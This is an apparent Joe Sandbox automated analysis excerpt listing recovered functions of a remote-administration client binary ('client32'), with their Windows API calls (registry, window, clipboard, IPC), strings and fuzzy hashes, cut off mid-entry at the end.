Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ItemMenu$Info$CheckCountEnable_memset
String ID: 0
API String ID: 2755257978-4108050209
Opcode ID: 64426ca387f460fb7a01fd0aca5c54c25300771ffc0ff337154cefcaf6503ee4
Instruction ID: 3498b13fe94e5af900cf0a89c9b181a4bb2b9f9614c8d31ca7af4f255d02c70f
Opcode Fuzzy Hash: 64426ca387f460fb7a01fd0aca5c54c25300771ffc0ff337154cefcaf6503ee4
Instruction Fuzzy Hash: AB31A170D41219ABEB01DFA4C988BDEBBFCEF46398F008059F851EB250D7B59A44CB60

Function 11131730 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 102registrystringmemoryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\ProductOptions,00000000,00020019,?,74DF0BD0,00000000,?,?,?,1113832B,Terminal Server), ref: 1113176C
RegCloseKey.ADVAPI32(?,?,?,?,1113832B,Terminal Server), ref: 1113181D

Part of subcall function 11143BD0: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1111025B,75BF8400,?,?,11145D2F,00000000,CSDVersion,00000000,00000000,?), ref: 11143BF0

LocalAlloc.KERNEL32(00000040,1113832B,00000000,?,?,?,?,?,?,?,?,?,?,?,1113832B,Terminal Server), ref: 111317A4
lstrcmpA.KERNEL32(00000000,?), ref: 111317E6
lstrlenA.KERNEL32(00000000), ref: 111317ED
LocalFree.KERNEL32(00000000), ref: 11131808

Strings

ProductSuite, xrefs: 11131787, 111317BD
System\CurrentControlSet\Control\ProductOptions, xrefs: 1113175D

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Local$AllocCloseFreeOpenQueryValuelstrcmplstrlen
String ID: ProductSuite$System\CurrentControlSet\Control\ProductOptions
API String ID: 2999768849-588814233
Opcode ID: ecb84a4cf3fbf479d0a09f1b815cb519d276a5df4c85cacf1ff69a98aeca7d6a
Instruction ID: 2515fb7f011805fb85e8c25417bcbf5fc72413bf415e28cc1fef82dce871dec7
Opcode Fuzzy Hash: ecb84a4cf3fbf479d0a09f1b815cb519d276a5df4c85cacf1ff69a98aeca7d6a
Instruction Fuzzy Hash: 323163B6D1425DBFEB11CFA5CD84EAEF7BCAB84619F1441A8E814A3604D730AA0487A5

Function 1101D720 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 100registryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 1101D750
GetClassInfoExA.USER32(00000000,NSMChatSizeWnd,?), ref: 1101D76A
_memset.LIBCMT ref: 1101D77A
RegisterClassExA.USER32(?), ref: 1101D7BB
CreateWindowExA.USER32(00000000,NSMChatSizeWnd,11195264,00CF0000,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 1101D7EE
GetWindowRect.USER32(00000000,?), ref: 1101D7FB
DestroyWindow.USER32(00000000), ref: 1101D802

Strings

NSMChatSizeWnd, xrefs: 1101D75C, 1101D7B1, 1101D7E8

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$Class_memset$CreateDestroyInfoRectRegister
String ID: NSMChatSizeWnd
API String ID: 2883038198-4119039562
Opcode ID: 4a493ff1cb6d2adaa5d9d5f451e97c7e27dd5ac9b7e193787943fcead3d8059b
Instruction ID: fd9a6760edc21507823d477136c8404e9cdc8da2703fb475a86e8304a251f150
Opcode Fuzzy Hash: 4a493ff1cb6d2adaa5d9d5f451e97c7e27dd5ac9b7e193787943fcead3d8059b
Instruction Fuzzy Hash: 8E3130B5D0120DAFDB10DFA5DDC4AEEF7B8FB48218F20452DE82AB6240D7356905CB50

Function 11033470 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 97registryclipboardCOMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 110334CA
_memset.LIBCMT ref: 11033501
RegisterClipboardFormatA.USER32(?), ref: 11033529
GetLastError.KERNEL32 ref: 11033534

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

_memmove.LIBCMT ref: 1103357E

Strings

(*ppClipData)->pData, xrefs: 110334E8
..\ctl32\clipbrd.cpp, xrefs: 110334A8, 110334E3
!*ppClipData, xrefs: 110334AD

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorLast$ClipboardExitFormatMessageProcessRegister_malloc_memmove_memsetwsprintf
String ID: !*ppClipData$(*ppClipData)->pData$..\ctl32\clipbrd.cpp
API String ID: 2414640225-228067302
Opcode ID: a281c199816086c302d4a90be5995ec6ca2508b22fb786701224507432c0cb7e
Instruction ID: 82b91b0b5d2de246ea4be34add9884a3f681a3774444f6be8ea8d99c2c4d4bf7
Opcode Fuzzy Hash: a281c199816086c302d4a90be5995ec6ca2508b22fb786701224507432c0cb7e
Instruction Fuzzy Hash: C7316F79A00706ABD714DF64C881B6AF3F4FF88708F14C558E9599B341EB71E954CB90

Function 11027040 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 94sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000032), ref: 110270E9
GetTickCount.KERNEL32 ref: 110270F7
GetTickCount.KERNEL32 ref: 11027107

Strings

HandleIPC ret %x, took %d ms, xrefs: 11027110
IPC, what=%d, msg=x%x, wP=x%x, lP=x%x, timeout=%d, sender=x%x (%d), xrefs: 11027098
Warning. IPC msg but no wnd. Waiting..., xrefs: 110270BF
Warning. IPC took %d ms - possible unresponsiveness, xrefs: 11027127
IPC copydata, dw=%d, cb=%d, pv=x%x, sender=x%x (%d), xrefs: 11027079

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountTick$Sleep
String ID: HandleIPC ret %x, took %d ms$IPC copydata, dw=%d, cb=%d, pv=x%x, sender=x%x (%d)$IPC, what=%d, msg=x%x, wP=x%x, lP=x%x, timeout=%d, sender=x%x (%d)$Warning. IPC msg but no wnd. Waiting...$Warning. IPC took %d ms - possible unresponsiveness
API String ID: 4250438611-314227603
Opcode ID: cf922524ba4b939dac619c14ad9c82c8a96acbc09ed8cabbbd0cfb614c38f24c
Instruction ID: 36f6635ed5369738cce6f54d2d5b10a636314f1ad60547d54338f1edfc411986
Opcode Fuzzy Hash: cf922524ba4b939dac619c14ad9c82c8a96acbc09ed8cabbbd0cfb614c38f24c
Instruction Fuzzy Hash: FF21C379E01619EBD321DFA5DCD0EABF7ADEB95218F104529F81943600DB31AC44C7A2

Function 11009500 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 92fileCOMMON

Download Yara Rule

APIs

_strncmp.LIBCMT ref: 1100953A
_strncmp.LIBCMT ref: 1100954A
WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,B6DE5DE1), ref: 110095EB

Strings

IsA(), xrefs: 110095A5, 110095CD
<tr><td valign="middle" align="center"><p align="center"><img border="0" src="%s" align="left" width="16"> </p></td><td><p align="left"><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><a>%s</a></font></p></td><td> </td><td , xrefs: 11009571
http://, xrefs: 11009535, 11009548
e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 110095A0, 110095C8
https://, xrefs: 1100952F

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _strncmp$FileWrite
String ID: <tr><td valign="middle" align="center"><p align="center"><img border="0" src="%s" align="left" width="16"> </p></td><td><p align="left"><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><a>%s</a></font></p></td><td> </td><td $IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://$https://
API String ID: 1635020204-3154135529
Opcode ID: 792e616861f9a4ae8c30573813f2543d714be5633bae0a01c5bd2a42a3bb713b
Instruction ID: 3ad994666f9f4a7bc5965cb6aac6b353dc675ffe3b9ee49526350f7e9061b273
Opcode Fuzzy Hash: 792e616861f9a4ae8c30573813f2543d714be5633bae0a01c5bd2a42a3bb713b
Instruction Fuzzy Hash: D3318D75E0061AABDB00CF95CC45FDEB7B8FF49254F004259E825B7280E731A504CBB0

Function 110BBA30 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 85COMMON

Download Yara Rule

APIs

LoadCursorA.USER32(00000000,00007F02), ref: 110BBB05
SetCursor.USER32(00000000), ref: 110BBB12
SetCursor.USER32(00000000), ref: 110BBB15

Strings

j CB::OnClose(), xrefs: 110BBA57
IsA(), xrefs: 110BBABC
e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 110BBAB7
*WindowPos, xrefs: 110BBA82
*StartPage, xrefs: 110BBAD7

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Cursor$Load
String ID: *StartPage$*WindowPos$IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$j CB::OnClose()
API String ID: 1675784387-712237611
Opcode ID: 4e6367ffc696bb50fdec8939701d381be67fc3cfd281f09088e414329cc7f8c5
Instruction ID: 66eb69117401dead706df7fe1c42db9e1a1654b60b24fea786671a461f93cb82
Opcode Fuzzy Hash: 4e6367ffc696bb50fdec8939701d381be67fc3cfd281f09088e414329cc7f8c5
Instruction Fuzzy Hash: ED217E78B00A11AFE624EB69CC90F6AB3E5AF88704F104448E2864B791CB75BC41CB99

Function 11027450 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetWindowTextA.USER32(?,?,00000080), ref: 11027474
GetClassNameA.USER32(?,?,00000080), ref: 1102749F
GetDlgItem.USER32(?,00000001), ref: 110274C8
GetDlgItem.USER32(?,00000004), ref: 110274CF
GetDlgItem.USER32(?,00000008), ref: 110274DA
PostMessageA.USER32(?,00000010,00000000,00000000), ref: 110274F6

Strings

#32770, xrefs: 110274AB
Tapiexe, xrefs: 11027480

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Item$ClassMessageNamePostTextWindow
String ID: #32770$Tapiexe
API String ID: 3170390011-3313516769
Opcode ID: c0ef354846b222e435f384819da54f80d37799a52fb5b20f16ffd1bead33262d
Instruction ID: 1b12e394e200b75f11f599ec6ab4d64d4751b928bcc344eaa962945fc7b69462
Opcode Fuzzy Hash: c0ef354846b222e435f384819da54f80d37799a52fb5b20f16ffd1bead33262d
Instruction Fuzzy Hash: E721BB31E4022D6BEB20DA659D41FDEF7ACEF69709F4000A5F641A61C0DFF56A44CB90

Function 11023390 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 70windowCOMMON

Download Yara Rule

APIs

GetDlgItemTextA.USER32(?,?,?,00000100), ref: 110233C2

Part of subcall function 1101FFB0: wsprintfA.USER32 ref: 11020078

SetDlgItemTextA.USER32(?,?,11195264), ref: 110233FD
GetDlgItem.USER32(?,?), ref: 11023414
SetFocus.USER32(00000000), ref: 11023417
GetDlgItem.USER32(00000000,?), ref: 11023445
EnableWindow.USER32(00000000,00000000), ref: 1102344A

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h, xrefs: 1102342E
m_hWnd, xrefs: 11023433

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Item$Textwsprintf$EnableErrorExitFocusLastMessageProcessWindow
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
API String ID: 1605826578-1986719024
Opcode ID: f36cc34cc9a969abcf6566481c33c0cc2ea65c20e1744d3420329027fe5297bf
Instruction ID: 8db35bf72fe99370d3eedeccbec7b94c25a8ea314d3c8a10113fa065dea7662b
Opcode Fuzzy Hash: f36cc34cc9a969abcf6566481c33c0cc2ea65c20e1744d3420329027fe5297bf
Instruction Fuzzy Hash: F721BB79600718ABD724DBA1CC85FABF3BCEB84718F00445DF66697640CA74BC45CB64

Function 11145120 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(?), ref: 1114513D
_memset.LIBCMT ref: 1114515E
GetMenuItemInfoA.USER32(?,00000000,00000001,?), ref: 1114519B
CreatePopupMenu.USER32 ref: 111451AA
GetMenuItemCount.USER32(?), ref: 111451D3
InsertMenuItemA.USER32(?,00000000,00000001,00000030), ref: 111451E4
GetMenuItemCount.USER32(?), ref: 111451EB

Strings

0, xrefs: 11145177

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Menu$Item$Count$CreateInfoInsertPopup_memset
String ID: 0
API String ID: 74472576-4108050209
Opcode ID: b25f34294336de4f8839e45289e2c114ec1c9262bee8a9cac9f6491c5d519ada
Instruction ID: c294618d83ba700a36b9fba62bf733376f49e09b6547452e6c31807948eb4840
Opcode Fuzzy Hash: b25f34294336de4f8839e45289e2c114ec1c9262bee8a9cac9f6491c5d519ada
Instruction Fuzzy Hash: 7A21AC7180022CABDB24DF50DC88BEEF7B8EB49719F0040A8E519A6540CBB45B84CFA0

Function 11119BF0 Relevance: 13.7, APIs: 9, Instructions: 154COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 11119C67
MapWindowPoints.USER32(00000000,?,?,00000002), ref: 11119C79
GetSystemMetrics.USER32(00000002), ref: 11119C87
GetSystemMetrics.USER32(00000003), ref: 11119C9F
GetSystemMetrics.USER32(0000004E), ref: 11119CEE
GetSystemMetrics.USER32(0000004F), ref: 11119CF8
GetSystemMetrics.USER32(00000000), ref: 11119D0B
GetSystemMetrics.USER32(00000001), ref: 11119D1E
GetWindowRect.USER32(?,?), ref: 11119D8B

Part of subcall function 11095990: GetSystemMetrics.USER32(0000004C), ref: 1109599E
Part of subcall function 11095990: GetSystemMetrics.USER32(0000004D), ref: 110959A7
Part of subcall function 11095990: GetSystemMetrics.USER32(0000004E), ref: 110959AE
Part of subcall function 11095990: GetSystemMetrics.USER32(00000000), ref: 110959B7
Part of subcall function 11095990: GetSystemMetrics.USER32(0000004F), ref: 110959BD
Part of subcall function 11095990: GetSystemMetrics.USER32(00000001), ref: 110959C5

Part of subcall function 11095920: _memset.LIBCMT ref: 1109594F
Part of subcall function 11095920: FreeLibrary.KERNEL32(00000000,?,75C04920,11119E07,00000002), ref: 1109595A

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MetricsSystem$Window$Rect$FreeLibraryPoints_memset
String ID:
API String ID: 314733930-0
Opcode ID: ffbe80ec5c7be6277551f47d8a5d3bcbf3a975e34dc442d0e2f93cbdde94097c
Instruction ID: 481f58b58db7c1b22ecc32cf71a8a36d2796d8213e8680ad797dec510adba49f
Opcode Fuzzy Hash: ffbe80ec5c7be6277551f47d8a5d3bcbf3a975e34dc442d0e2f93cbdde94097c
Instruction Fuzzy Hash: B4611D71D0065A9FDB24CF64C984BEDF7F5FB48704F0045AAD91AA7284EB74AA84CF90

Function 11037B70 Relevance: 13.6, APIs: 9, Instructions: 149COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 11037BA7

Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
